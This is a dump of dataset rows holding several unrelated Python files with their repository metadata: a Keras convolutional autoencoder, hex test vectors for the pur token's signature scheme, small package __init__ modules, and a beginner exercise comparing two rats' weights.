] | null | null | null |
linora/feature_selection/__init__.py
|
Hourout/linora
|
4269516c9227a18bd1a65e1c6a59e73c74e874d0
|
[
"Apache-2.0"
] | 3
|
2019-04-09T12:17:34.000Z
|
2020-08-20T04:33:31.000Z
|
from linora.feature_selection._select import *
from linora.feature_selection._credit import *
| 31.333333
| 46
| 0.851064
| 12
| 94
| 6.333333
| 0.583333
| 0.263158
| 0.447368
| 0.684211
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 94
| 2
| 47
| 47
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c39c6c73514fc1bec8a1c3acc81c95c621e66b3c
| 8,857
|
py
|
Python
|
module_autoencoder.py
|
varennes/deep-autoencoder
|
e96ac4ac850d51d54495a02f9c19c4857afc8189
|
[
"MIT"
] | null | null | null |
module_autoencoder.py
|
varennes/deep-autoencoder
|
e96ac4ac850d51d54495a02f9c19c4857afc8189
|
[
"MIT"
] | null | null | null |
module_autoencoder.py
|
varennes/deep-autoencoder
|
e96ac4ac850d51d54495a02f9c19c4857afc8189
|
[
"MIT"
] | 1
|
2020-10-06T10:52:16.000Z
|
2020-10-06T10:52:16.000Z
|
from keras.models import Model
from keras.layers import Input, Conv2D, Dense, MaxPooling2D, UpSampling2D
class Encoder:
def __init__(self, input_tensor):
self.model = self.get_model( input_tensor)
def get_model(self, input_tensor):
ec_block1 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='ec_b1_conv1')(input_tensor)
ec_block1 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='ec_b1_conv2')(ec_block1)
ec_block1 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b1_pool')(ec_block1)
ec_block2 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='ec_b2_conv1')(ec_block1)
ec_block2 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='ec_b2_conv2')(ec_block2)
ec_block2 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b2_pool')(ec_block2)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv1')(ec_block2)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv2')(ec_block3)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv3')(ec_block3)
ec_block3 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b3_pool')(ec_block3)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv1')(ec_block3)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv2')(ec_block4)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv3')(ec_block4)
ec_block4 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b4_pool')(ec_block4)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv1')(ec_block4)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv2')(ec_block5)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv3')(ec_block5)
return Model( inputs=input_tensor, outputs=ec_block5)
class Decoder:
def __init__(self, input_tensor):
self.model = self.get_model( input_tensor)
def get_model(self, input_tensor):
dc_block1 = Dense(512, activation='relu', name='dc_b1_dense1')(input_tensor)
dc_block1 = Dense(784, activation='relu', name='dc_b1_dense2')(dc_block1)
dc_block2 = Conv2D( 16, (3, 3), padding='same',
activation='relu', name='dc_b2_conv1')(dc_block1)
dc_block2 = UpSampling2D(size=(2, 2), name='dc_b2_upsample')(dc_block2)
dc_block3 = Conv2D( 32, (3, 3), padding='same',
activation='relu', name='dc_b3_conv1')(dc_block2)
dc_block3 = UpSampling2D(size=(2, 2), name='dc_b3_upsample')(dc_block3)
dc_block4 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='dc_b4_conv1')(dc_block3)
dc_block4 = UpSampling2D(size=(2, 2), name='dc_b4_upsample')(dc_block4)
dc_block5 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='dc_b5_conv1')(dc_block4)
dc_block5 = UpSampling2D(size=(2, 2), name='dc_b5_upsample')(dc_block5)
dc_block6 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='dc_b6_conv1')(dc_block5)
dc_block6 = Conv2D( 3, (3, 3), padding='same',
activation='relu', name='dc_b6_conv2')(dc_block6)
return Model( inputs=input_tensor, outputs=dc_block6)
class Autoencoder:
def __init__(self, input_tensor):
self.model = self.get_model( input_tensor)
self.layer_names = [ layer.name for layer in self.model.layers]
def get_model(self, input_tensor):
ec_block1 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='ec_b1_conv1')(input_tensor)
ec_block1 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='ec_b1_conv2')(ec_block1)
ec_block1 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b1_pool')(ec_block1)
ec_block2 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='ec_b2_conv1')(ec_block1)
ec_block2 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='ec_b2_conv2')(ec_block2)
ec_block2 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b2_pool')(ec_block2)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv1')(ec_block2)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv2')(ec_block3)
ec_block3 = Conv2D(256, (3, 3), padding='same',
activation='relu', name='ec_b3_conv3')(ec_block3)
ec_block3 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b3_pool')(ec_block3)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv1')(ec_block3)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv2')(ec_block4)
ec_block4 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b4_conv3')(ec_block4)
ec_block4 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2),
name='ec_b4_pool')(ec_block4)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv1')(ec_block4)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv2')(ec_block5)
ec_block5 = Conv2D(512, (3, 3), padding='same',
activation='relu', name='ec_b5_conv3')(ec_block5)
dc_block1 = Dense(512, activation='relu', name='dc_b1_dense1')(ec_block5)
dc_block1 = Dense(784, activation='relu', name='dc_b1_dense2')(dc_block1)
dc_block2 = Conv2D( 16, (3, 3), padding='same',
activation='relu', name='dc_b2_conv1')(dc_block1)
dc_block2 = UpSampling2D(size=(2, 2), name='dc_b2_upsample')(dc_block2)
dc_block3 = Conv2D( 32, (3, 3), padding='same',
activation='relu', name='dc_b3_conv1')(dc_block2)
dc_block3 = UpSampling2D(size=(2, 2), name='dc_b3_upsample')(dc_block3)
dc_block4 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='dc_b4_conv1')(dc_block3)
dc_block4 = UpSampling2D(size=(2, 2), name='dc_b4_upsample')(dc_block4)
dc_block5 = Conv2D(128, (3, 3), padding='same',
activation='relu', name='dc_b5_conv1')(dc_block4)
dc_block5 = UpSampling2D(size=(2, 2), name='dc_b5_upsample')(dc_block5)
dc_block6 = Conv2D( 64, (3, 3), padding='same',
activation='relu', name='dc_b6_conv1')(dc_block5)
dc_block6 = Conv2D( 3, (3, 3), padding='same',
activation='relu', name='dc_b6_conv2')(dc_block6)
return Model( inputs=input_tensor, outputs=dc_block6)
def freeze_encoder(self):
for name in self.layer_names:
if name.startswith('ec'):
self.model.get_layer( name).trainable = False
def thaw_encoder(self):
for name in self.layer_names:
if name.startswith('ec'):
self.model.get_layer( name).trainable = Train
def freeze_decoder(self, freeze_list=[]):
# if no list / empty list provided, freeze all decoder layers
if len(freeze_list)==0:
for name in self.layer_names:
if name.startswith('dc'):
self.model.get_layer( name).trainable = False
else:
for name in freeze_list:
self.model.get_layer( name).trainable = False
def freeze_status(self):
print '\n AE MODEL LAYER TRAINING STATUS'
for name in self.layer_names:
print ' layer %s - Trainable = %s' % ( name, self.model.get_layer(name).trainable)
| 49.480447
| 94
| 0.555832
| 1,111
| 8,857
| 4.170117
| 0.076508
| 0.126916
| 0.163177
| 0.106626
| 0.91539
| 0.911289
| 0.892294
| 0.88474
| 0.874811
| 0.866393
| 0
| 0.082134
| 0.301682
| 8,857
| 178
| 95
| 49.758427
| 0.666936
| 0.006661
| 0
| 0.859155
| 0
| 0
| 0.118577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.014085
| null | null | 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3ace37e58af4298980e94d7c4ee67664bed5732
| 12,877
|
py
|
Python
|
src/pur/crypto/doctest_data.py
|
pur-token/pur-core
|
ce372be274262a839c45436dfee58ba4ea105074
|
[
"MIT"
] | null | null | null |
src/pur/crypto/doctest_data.py
|
pur-token/pur-core
|
ce372be274262a839c45436dfee58ba4ea105074
|
[
"MIT"
] | null | null | null |
src/pur/crypto/doctest_data.py
|
pur-token/pur-core
|
ce372be274262a839c45436dfee58ba4ea105074
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# Distributed under the MIT software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
from pypurlib.pypurlib import hstr2bin, bin2hstr
def binvec2hstr(data):
return [bin2hstr(b) for b in data]
purss_test_eseed1 = bytes([0x10, 0x02, 0x00] + [0] * 48)
purss_test_eseed2 = bytes([0x10, 0x02, 0x00] + [1] * 48)
new_keys_expected = ('000000000000000000000000000000000000000000000000',
'\x83\xa9\x1aMzV\n\xbdA\xea\x95\xf4\x12\xcd\xe9\x8e\xda\x03v\x9dr\xb5u[\xb7\xc4\xabt3\xe750 ?\xa6p\xa4\xc6\xd4\xf2\xadZ\xc0\xf8\xf0\xce0\xa7', "2\xee\xe8\x08\xdc|]\xfe&\xfdHY\xb4\x15\xe5\xa7\x13\xbdv@6\xbb\xee\xfdzT\x1d\xa9\xa1\xcc{\x9f\xca\xf1}\xa09\xa6'V\xb685\xde\x17i\xe0^")
purss_pk_expected1 = '000200eb0372d56b886645e7c036b480be95ed97bc431b4e828befd4162bf432858df83191da3442686282b3d5160f25cf162a517fd2131f83fbf2698a58f9c46afc5d'
purss_pk_expected2 = '000200eb0372d56b886645e7c036b480be95ed97bc431b4e828befd4162bf432858df83191da3442686282b3d5160f25cf162a517fd2131f83fbf2698a58f9c46afc5d'
purss_sk_expected1 = '00000000eda313c95591a023a5b37f361c07a5753a92d3d0427459f34c7895d727d62816b3aa2224eb9d823127d4f9f8a30fd7a1a02c6483d9c0f1fd41957b9ae4dfc63a3191da3442686282b3d5160f25cf162a517fd2131f83fbf2698a58f9c46afc5deb0372d56b886645e7c036b480be95ed97bc431b4e828befd4162bf432858df8'
purss_sk_expected2 = '00000000cd7ec7a104f01855ea39946b36fb02e9484a5fe58f6ab04f5a6420cce1c3f06bd257d174803df26ed03edd1edc8c4fdcedd39cb250426b468b028c9b1ce0ee507c0e0d17374d4dfe29afdd0b1b4aed369809351b6ba6aeffbcc7eeb6bf3aa5190c38e56c770db22b33560fb5cb6ffa992d6d8d28fa94b915a7472316018f32c6'
purss_mnemonic_eseed1 = '0002006b6c5c1c859079864060ff38e67940394bb4439fddafa6fc716731dec13a0f29ca9b9001527e8daf0851245cbf738435'
purss_mnemonic_eseed2 = '0002004493ca509e5550a50af4c5a357c041b7bb4d15f77662d0bfe04d4c2ee1eff87a0580c7bc6878c468257a977fd167378e'
purss_mnemonic_test1 = 'aback bunny honey shell brass fund lance hairy greedy villa told nearer defect row ease writer radius influx inter jacket tank beauty away oven organ abbey flick train quote magic career slope java earl'
purss_mnemonic_test2 = 'aback bunny editor digit fine tight finish finish voice galley friend agency ridge render bet kin guide aside tecum star common budget wheel patron lobe leaky helm mildew heir fridge noun worthy heart lad'
purss_sign_expected1 = '00000000d1f266ccb592d4695045c0bd5f80b66fcd4c14c0b7b98896f80cc2b0b89f3fc5088de12a087c94b16b4d7e91aa728491c559cecab3335c61d7cd2a26737932a82609b4c48e1e5f37f1b8ddcab3b48b82b2624f24bba2687a394739d5de61c3b1777f9a9be7ecafac0e440b66c961d017b1585b31e330d8c07646ba08237cf48aeb4bfead47e50ead6340c62ec4b46a83578d759aee1a5dca7b69a508cd01dfabf131eaf0b51ba9cb4b631d3bc468d5433c0dd8f0d30001aeb715e19c0c5ecb07504509a11ef692c53df4daa875e8e7b9b15f6757139172cb0e8d78b9148b60223b7fc0d5c9637872fa2d6ddc5a2442f968b6d54c0705f883f6c95b8c4c2c5648d32dc6c7ede6208139beda79c9430e7900def25fbe4a530bab94d2ef0a016f8cb0ef2f1ec92c9ea5c16984e7de26bd5bd1d36e871b18faf1ec450de9ac15453011da2507583f24d15a4fc38c6b0d68ed7ac63506bb54127185db46f4e8f6ec8a5f5f4736c889d39834c2eab1185efca3cd6815e3d00826b160a4727128ae569c61f37479cfaa25287b19269098a8d95b1c9919effcbf7dda6e933b907ec11b16230064e530270128b26b28772f3165a9e7f4fdb02a3df9edd3aa70be2781df644e3707e017a0b528245356f0028ecc81aedba1e89f68211d955094a13b61ed0582eec00120da6a37a4ef8c7926c74ee24cfe9672f869606d3cb56abef8a4a1d151218f00b1cb6d5b268fc1f90f40cc2cd8d082df91eb9111a8f183c261baa7f951b90e3c67068e12a9f3c4a2545f7fa935eaf8b69b31b2a140536fb2b309fd3eda999d7e4f6c923942e48b0bdfcaf9e766da671eb8a5bf549d3f5cb673e79f4228723a03e35caafd073d4675e818471064b0272b002fcc414274c12344d640ac0902cc172cde619172ccecb5a05c02e969e38fe13f3e03afa816df68e2112f445cf23208d3f7f02c01411cbe69de34436403d55982d1f35373002205a18fe8e23ef9a9a2c405f6c6acf270ee5ad977b69e5fc180180ffee0a09423fd132adb2f86892a723086dcdfc5e46f44284ca3b955eb1186eb9282124cee081017341d79565082f53f2ba96fbf4d20d3ff223fcc4018ff400c720735e3c4391f1652e6a488971792b04cbe8d60681e19e4577394cdec2fdd60816886e2c3b9d82c8bae31484e62f549fb5cbc46508718d8c3180567be64e453c229f673dd8eaa3621c7881a568be8c49f36c8541ba66077d4be5b9a75a1f894e1cde95a3963aeb3616cf8bc65f6bae07e11a9915db81d0a149c01b6129017951070353120bf71f22fab25609903ffd2b07726223dc4a673f5cc84b6bae6092764e1338cf68f3684eb0470c92ec8fdc13ad6701d16ce7c061346c43294e4307ccf86f08385e216f07160b0ad633bfd2cbc4b060760d97aae0e57387e1b8eb76e626b158f34ecb44965e616e3a27e2e36dc4a07cac6feeb6a2d365c01b1611a163b01d3774525deef2ff4d610fed4bf6f88a339aa272fd53db4686a88ab5dfe0ff4a595cb33fba265e8e926c3ae11eddee32fce36227cf8f2ffe2520ed711fd2bd4f9aab5808615b49fb58297636ae9a7a9e72e70d66668fca79ba451d1d9fe85a11fc4a1afac153b18a47d3d05dddc39937d27b74067501d5d4fff6322513de4d81844c479e66b68eda4c1c49f5091c2074c4244cbe4cbb11d72ca7478f5a131d50162108df5885f8a784b10cedad809b6559b8aadde1c6b9b7979402977c00adda162da0bafc35fc95d175d8ed903bcd40fb4dde7e9764ed74abb5951612df24acf800e295f161f775c0db2b00318d98e2607e84f4853063f67b486190ca76af08189bdc9eee750f7bbda30571f2d568f31785aee982892d464686bb1909700717f20d63da1bbd9e1f77ece4ce0c3a9942a4a5c34f33be6d8d05ca9d806973b75d0399e20075eec49ffd538830ec15904789e4a4465b75b3e5ce1720f694cdaff5505aee08ddf1b476837ceb221eae8fb38c42c3bbcc1752896b84eb1d5574b28ef43e11499c9154d3864a2eeb0b7b7fc09a940b4b9290ebe0e9f7b9beac9a3acdee2a1086c03f48744928fd4a49c47e1519a34171ac386acdfba882d0b72c4133ebcc495944695db788f7c713a60a8db4e02925e1c3e05b04b55162248fc7e02665b2bf80db62548bf4b152064966e18a30fa60d58507d2f8a7ba472716f83d20cfffd2e1aa48d3aacbe1407804a4b9e55cad9cec03cd98e9bd1b375db6b0c43286327adbe8f9e9c61c3357b9d89f08fd6826081ee37ab0a126a6c03c8406fea8d00eecafa3965c80a5fb9c9be56968dbbcff6fbc3d751c1558d52b1d486f7653c4da4cc7736f4ca6197ed8e05c0173bf722dd0a6bc10c472f227b53db3cd8c86ac941fe237d3b090611a0c49874c03b4004f9e549b7b5176d1d5b6704691f7dcece80e944a5bc1621aa7084701c013e17c259c8e574389df3d93ab46cc579845d513d8daf7ca2602da35de06824894a4698ec7da593a044289a28c3cacc2f0e3fb5ae93adb27d6b77d6870c0008b0a6c2533007e1fbd7484ebb590593905a9e6befb94a77249f4fdb9313af630c1bee598ca23ca8989b4d92103fc8c5e2cfee942ade8cd0e06dc7738b99024e9d2120a741272eedf95d6242c4809fa36afd8f046addbb42ac5133e884e3dca0bc9527e9a5348069321aa7badcb31f4bffb3646fb82f2a7bccb3a09d89e82e32dadf7f289da46fd53382fe930451209aee69c147a5bde8c9a93600ed4699a0d78acea3dd754cf2049ba569b8767df72592e1b3759f47627be0ea4cac7c0022b8614e93062da73055752f376157daed9f8562b91388a5ad1a62a2c318189c0c8acaec10be88637c2ffe324319788d19f9a91edc81ed7f5bd90c38073ce0cc2d1c0eb499ffde37a188501db0e7198f364d6708cb4d9cf0b5b68091446b2992f0fb989b20fdfbd6a686113421fad8bb1b1e82c673a06f7ef4d9173c6dc6cffe4e09d94e0831065df2caea0690e7d52bd752e26f8f25bc14933daff9dcc8885273912cda790254f7def121ef957b2b918861c84d0e9b17a080c7c3812659d0702aa3e3184702e7ae6be645d70f089b1e9793f656ff9515603b5c483867acadb155ca848f1e1a4b73acbc9d4ebd2d78ce27e088d58e32a5ae39701ee1f7197a793358107631e5430b16fe3d97837bca9f3923a329835c5a3a961ee685d1394a3d55101e1919502f6f1f788b3f95700efe2e177f03e06a4e81ec4fa0183b787d'
purss_sign_expected1_h = 4
purss_sign_expected2 = '000000008fbe58a72f1849f4f4517e809d61722971da0bea954161148c2c9fc7f691061e8945b1099561c8421cd4f2add89362c52be2c575cbddb1d5252e8fd70901973cacf655e8197af20a2c0b474718d94bdc83196c4b5c864fad3c1e5fc8419cb4561ee43a4ce870ea89196d95c26b7832b543271c801f9148089c5f91d091c1723e50657bdc0448d3d025134d6dea78b463e20276ba30eb42fa38c9cc62965c1f1b4b48fe85c76cdb688f38b63e2677affe4763e092f11317d6b3d652d7330a0c964c35ab323a2ae9152783246d5c5eadc949c218248fc539f40175c91a35d79bd371a143acaa6ff76e02a86324dedb139daaebf8933bee9b2c3832e844bd3eca9cf12866253ab4269f3561b14e506164927a256b3b64f49370bc1998b47064185b9c9e63f8842df71c9e0b455105c8fe046b0b519aef2289d43c48d01d43d4078c63bad4e2670a6ed5f12e1edeabaa74b89558fb2aae583e463493c2b02cd531ca74640700fb377d4d0e1659adaeef65d299d91bb1bee85179531ec0bf2b93fb78b5d758844983c968236ca749d5319cc5dc9f6b78e7999a35232f3951a5d2032d7de35627f369d3fbdc8c5c4335dbae35c78e1845369e3ee940e452730ae6591ac86cc356b34a6a374554897b0714c84872fc42ca0b93467eae5b40b67e9c1fd9f5e33c0866d7b61d96d41ddab3ee44b5a950dbb46149bfd90e85896b177dfb384263784347d7e495e25d6d92de485c1754aa77c9ca5dac9edad186d944c697634d2de181a8627a5aa79bec12cd6c890cd27c8c7dd40f8bcbf3df0af9023e744eae768ad5b419a58f2b88492e992a2c123e2a383cdd10199327f4e2932b0b118eee046045fa568774aeac4bf01d93b29b1fe05f807f1d5240f93a22393e28a18a1e986c495f9134bec811484eb199ad46a302c9d520b892add2f181d0c8153d12b96f2e5c58d457868a22f7c39d25eb3fd58f92d9142fe96a9328398ae54c402cfdb80cd43317b57f343aa3e4cc491cc4d6dcf430562dd59b9459f8e88c18db962916bd089be0b0ea644840e4d4d7f65a30a470d4b45605a59bebb94bc0ed781956136b98538b812526afeaf0ff5e97caf13ad7a214d09d26ed075ff754ac8caf98920cb26d0a2ce78b46afec64dc18a000f8756bd66d99bba82f57aca7930b0dbb85e7cd5edd8d47249c6d4bb5df6813bebcb968efb3104b2d32e4c68838ab42f8e4c50283bb7aa064d16c5078c52831b91832d574c2fcdcb32b639a09a548a4bb0ba34961abe0324689dbc6117dd5e7570470682d33ddbb051907e5fa9d1b57cb6a27460d805776ddac79b0d8d22ca1c9642e04e9a9bcb98b1b88397c21b65a1606748d94d5bd66110f33ab2b09395e46fd538a59d405cb11e1f6e6776fdf21cc0ee34efc6f375a7534d0fd18b25044c3123b4877554edd46768aa79580c74c5c3186be2f6e79002c7e4454642fb128729f3112bb24987d91dc5e9629bb8c7612b50420445e398e0cf2502fa72a28e4053546efa81b0f32e3a9d789a94f9426bfc650f7d5e52d682c92024af033a5e6ea2a82082d11386186b2dd462927b6fb1d9ab61ac2efab772a8b6d98e394c78783c299202965b2609ebeb96ed6e36db142c1257ec31e6965470c4e0c56e1cd8569546e75f947dfcd96ea573ca86b4aa490d95d5b5bebe3298e5e9f7403d92aa5aab48b5cd6dc9a404e118d3efcd6ca0d8d92dff757b94f2ce36dd96c1ba5ca9415e9ab56bb3e9e1e2eca348ba0086356b5ddc9e9b3b399834940e822ba12e64854e026846a9fc90805b564f7e83e9a7733492f3f61cee597e4085cdb86e97fc629c487b0f8074a4e4094df7e37094b483957d2783500f657226958d5a6664eb78a8e6f1aa9ca0d2c7c28c0fc3361188292b4cd362ad7b2a4ee080ee711e67d6a180e0e0d3767f50d9f2cc8994c84a1dcf0b91d09da9201b468a3003d4f6842b65ba9c5faf776ec8becfaf023fa61944a003631d18da0044fbca055e3550631b23830b12a03bc5b621a8879919aa573b90fc712ff795521086aaa856b113782baa4bf641c29e624c2d382e04ee5087c66a27639c6bd92dd878b26df9dd064d3dead12f557772a696d50c9165ff037eb8463d84c38aa88239449a46a39a45d105967ce95c1a000937cde608b713fae3c30f1c3f2046c894a2f65239ac41f09c551e3f21d2190fa04f6ef8905260d2b8b5248ae6128b7b8536d894a79ae3758ac2f98af1768d705b66b468f2798ea2b2b68b62c9855adff2a36b54c4a3b511a5b3ee66f744112899c23a76234fec2a75856b2fa36c1ecf384f720345043532b838198e16d39726b0f11a21d7826f7b90b9c986e18be0bc482a42be922a31824613d8c9a853bb4aa9a773aa376c8fbfa02cdb1bb39adaba80e0cac48415b0df3fb2e4cdd3f4328c6715c7ce8866786964173ba6b3d52ec38f440a766de555e770cabe0a7bb7b3bb2fa80ce3ac746989e0f64fbc70af0fc897bc2cadc96bffacf261af85398b6cc72dd4241a04c48a2e08ebb80b1f585b628482004697da24e2d75543472d75d5f27607808fd8eef3da8e941536dd96fd5366f1026fe4e85b489be32663a05519706c4e390e6ef3d64466cee46058694eacd3305bc33e66b3317eb849768107cf52320f309df9265131bfa043dcda7ae8288fe3637d6b28f60d7c0bbcd5e6eaa14e9e15ed214e353d58a84bd623d95328b811cfab334fa4cd6ab0386c779b00caf4d2199a40993dcf0b7df287cf746e4954029d8eb432bb62d8135c50f966088b996538b9205ccd56a9f6af73f565b1ec816067b6b86ffca4f2722344fb3d0bdd7a396d2879b128a54357e110e016c36498b39fa26c40afbd2f342b89b134e3324cdc79fcbff14430be55763d0ea0f6f723fac1cfaad11e535b1b52f80a4e0919896512e2c42ebfef8e5c08c42dd4f2169e6fc94e3d529ae64fa5c5e184d670f6afa36bcac9d5431a132f2a9c5520009898c347c415e4e4b6d2ec0eb39fb41e3c8e89af040ee02f4fa732aff1102e23e0ea5c03372e0c097c16f8aea6ea719e698585105e7435365e08357a0f1340aaaab7cd8ab2a27c584a68227319202cd1a966e92a087c03085c56fd3214ccd10a31cc9cfecaafb5789b653b02335f13012ca3cec9bbf3561cba7a6894dbf343e42e92a76a83e7454ad2d8751e9cfdd62ea63df19a1359e62e1112a22df890706ddefd30c9f1a5882792827ef120f2e93039bd95f1ba3bcb0ceb41e7202'
purss_sign_expected2_h = 4
hashchain_reveal_input = hstr2bin('32eee808dc7c5dfe26fd4859b415e5a713bd764036bbeefd7a541da9a1cc7b9fcaf17da039a62756b63835de1769e05e')
hashchain_reveal_expected1 = '1d607de5dc840ca31b6cdc8aa2a0c5e7158396b27103a3a128c97994d33e3fce'
message_example = 'ff00003030303030303065007b2274797065223a20224d42227d0000ffff00003030303030303261007b2274797065223a2022504c222c202264617461223a20225b5c223137322e31382e302e365c225d227d0000ffff00003030303030303065007b2274797065223a20225645227d0000ffff00003030303030306434007b2274797065223a20224342222c202264617461223a20227b5c22626c6f636b5f6e756d6265725c223a20302c205c22686561646572686173685c223a205b35332c203133302c203136382c2035372c203138332c203231352c203132302c203137382c203230392c2033302c203139342c203232332c203232312c2035382c2037322c203132342c2036322c203134382c203131302c2038312c2031392c203138392c2032372c203234332c203231382c2038372c203231372c203230332c203139382c2039372c2038342c2031395d7d227d0000ffff00003030303030303635007b2274797065223a20225645222c202264617461223a20227b5c2267656e657369735f707265765f686561646572686173685c223a205c2243727970746f6e69756d5c222c205c2276657273696f6e5c223a205c22616c7068612f302e3435615c227d227d0000ff'
| 321.925
| 4,641
| 0.970956
| 251
| 12,877
| 49.665339
| 0.776892
| 0.004171
| 0.002086
| 0.002727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.590941
| 0.015842
| 12,877
| 40
| 4,642
| 321.925
| 0.392725
| 0.01126
| 0
| 0
| 0
| 0.181818
| 0.945322
| 0.913347
| 0
| 1
| 0.001885
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.045455
| 0.045455
| 0.136364
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3d78138747dbd0fd06cdd2b94c6713f8393812d
| 135
|
py
|
Python
|
backend/app/helpers/auth/__init__.py
|
shvixxl/tablic
|
3ca2f026d84fab9692e7e5adde74a9716266ff5e
|
[
"MIT"
] | 2
|
2021-02-05T16:55:41.000Z
|
2021-02-07T21:46:37.000Z
|
backend/app/helpers/auth/__init__.py
|
shvixxl/tablic
|
3ca2f026d84fab9692e7e5adde74a9716266ff5e
|
[
"MIT"
] | 1
|
2021-10-30T15:42:53.000Z
|
2021-10-30T15:42:53.000Z
|
backend/app/helpers/auth/__init__.py
|
shvixxl/tablic
|
3ca2f026d84fab9692e7e5adde74a9716266ff5e
|
[
"MIT"
] | null | null | null |
"""Auth helpers."""
from .password import generate_password_hash, check_password_hash
from .token import generate_token, verify_token
| 27
| 65
| 0.822222
| 18
| 135
| 5.833333
| 0.555556
| 0.266667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096296
| 135
| 4
| 66
| 33.75
| 0.860656
| 0.096296
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
c3dede7ab5e4f456d29dfa3cbda46e46e631678e
| 712
|
py
|
Python
|
chapter-09/exercise008.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
chapter-09/exercise008.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
chapter-09/exercise008.py
|
krastin/pp-cs3.0
|
502be9aac2d84215db176864e443c219e5e26591
|
[
"MIT"
] | null | null | null |
rat_1 = [1,2,3,4,5,6,7,8,9,10]
rat_2 = [11,12,13,14,15,16,17,18,19,20]
if rat_1[0] > rat_2[0]:
print("Rat 1 weighed more than rat 2 on day 1.")
else:
print("Rat 1 weighed less than rat 2 on day 1.")
if (rat_1[0] > rat_2[0]) and (rat_1[9] > rat_2[9]):
print("Rat 1 remained heavier than Rat 2.")
elif (rat_1[0] > rat_2[0]) and (rat_1[9] < rat_2[9]):
print("Rat 2 became heavier than Rat 1.")
print('and now, nested')
if rat_1[0] > rat_2[0]:
print("Rat 1 weighed more than rat 2 on day 1.")
if rat_1[9] > rat_2[9]:
print("Rat 1 remained heavier than Rat 2.")
else:
print("Rat 2 became heavier than Rat 1.")
else:
print("Rat 1 weighed less than rat 2 on day 1.")
| 29.666667
| 53
| 0.606742
| 156
| 712
| 2.666667
| 0.24359
| 0.153846
| 0.129808
| 0.076923
| 0.846154
| 0.846154
| 0.846154
| 0.846154
| 0.723558
| 0.713942
